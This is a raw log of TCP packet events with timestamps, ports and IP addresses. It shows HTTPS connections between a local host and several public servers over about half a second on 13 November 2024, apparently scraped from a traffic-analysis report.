                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873198032 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873220921 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873281956 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.873337984 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.874118090 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.874151945 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.882559061 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.891329050 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.898591995 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.899322033 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.906421900 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.906697989 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.906855106 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.907485008 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.907499075 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.917403936 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.917434931 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.917515039 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.917714119 CET49906443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.917726040 CET44349906151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.955229998 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.955661058 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.955670118 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.956026077 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.956315994 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.956386089 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.956419945 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.959981918 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.960278988 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.960287094 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.960741997 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.961009979 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.961091995 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.961093903 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.962909937 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.963531971 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.963556051 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.964550972 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.964611053 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.965490103 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.965539932 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.966192961 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.981194973 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.981237888 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.981309891 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.981570959 CET49907443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.981587887 CET4434990754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.996701956 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.996731043 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.997179031 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.997179031 CET49908443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.997209072 CET4434990854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003329992 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003350019 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003375053 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003412962 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003426075 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.003432989 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004251003 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004256010 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004385948 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004434109 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004565954 CET49899443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.004570007 CET44349899150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.007345915 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.010523081 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.010525942 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.010576010 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.010586977 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047565937 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047632933 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047647953 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047660112 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047694921 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.047708988 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.059271097 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.090557098 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094193935 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094214916 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094259977 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094278097 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094290972 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094333887 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094794989 CET49895443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.094805002 CET4434989599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.096328974 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.096371889 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.096422911 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.096878052 CET49909443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.096890926 CET44349909150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.097537994 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.097547054 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.097604990 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.097796917 CET49910443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.097806931 CET4434991099.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102005959 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102056026 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102107048 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102118015 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102125883 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102165937 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102166891 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102174044 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.102212906 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.104300976 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.118827105 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.118870974 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.118942022 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.119106054 CET49911443192.168.2.1744.234.198.184
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.119123936 CET4434991144.234.198.184192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.154524088 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.154536963 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.154740095 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.154778957 CET44349894142.250.184.228192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.154864073 CET49894443192.168.2.17142.250.184.228
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165755987 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165766001 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165786982 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165823936 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165824890 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165846109 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165864944 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165875912 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165890932 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165890932 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165899992 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.165935993 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.179070950 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.179939032 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.180036068 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.180433989 CET49904443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.180454016 CET4434990413.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183424950 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183732033 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183741093 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.184742928 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.185102940 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.185225964 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.185237885 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.185264111 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.185286999 CET4434989754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.191557884 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.191591024 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.191656113 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.191910028 CET49916443192.168.2.1713.107.246.45
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.191920996 CET4434991613.107.246.45192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193439960 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193506002 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193527937 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193547964 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193589926 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193609953 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193613052 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193630934 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193640947 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193645954 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193667889 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193692923 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.193785906 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.196659088 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.196711063 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.196739912 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.196746111 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.196777105 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.202096939 CET4434990113.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212196112 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212236881 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212260962 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212390900 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212399960 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.212451935 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.214723110 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.214862108 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.215605974 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.215713978 CET49900443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.215727091 CET4434990013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.234555006 CET49897443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.235389948 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.235619068 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.235635042 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239198923 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239278078 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239557028 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239644051 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239913940 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.239954948 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.250574112 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.250643969 CET49901443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.276968002 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.276998043 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.277074099 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.277276993 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.277293921 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.282547951 CET49902443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.282561064 CET443499023.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283241034 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283283949 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283324957 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283324003 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283349037 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.283418894 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.284250975 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305031061 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305077076 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305120945 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305124044 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305167913 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305200100 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.305226088 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309393883 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309438944 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309485912 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309487104 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309525013 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309541941 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309556961 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309571981 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309595108 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309601068 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309614897 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.309658051 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.310285091 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.310307980 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.310370922 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.310379982 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.310430050 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312786102 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312800884 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312850952 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312861919 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312890053 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.312913895 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314152956 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314215899 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314224005 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314734936 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314779997 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.314836025 CET49889443192.168.2.17157.240.0.6
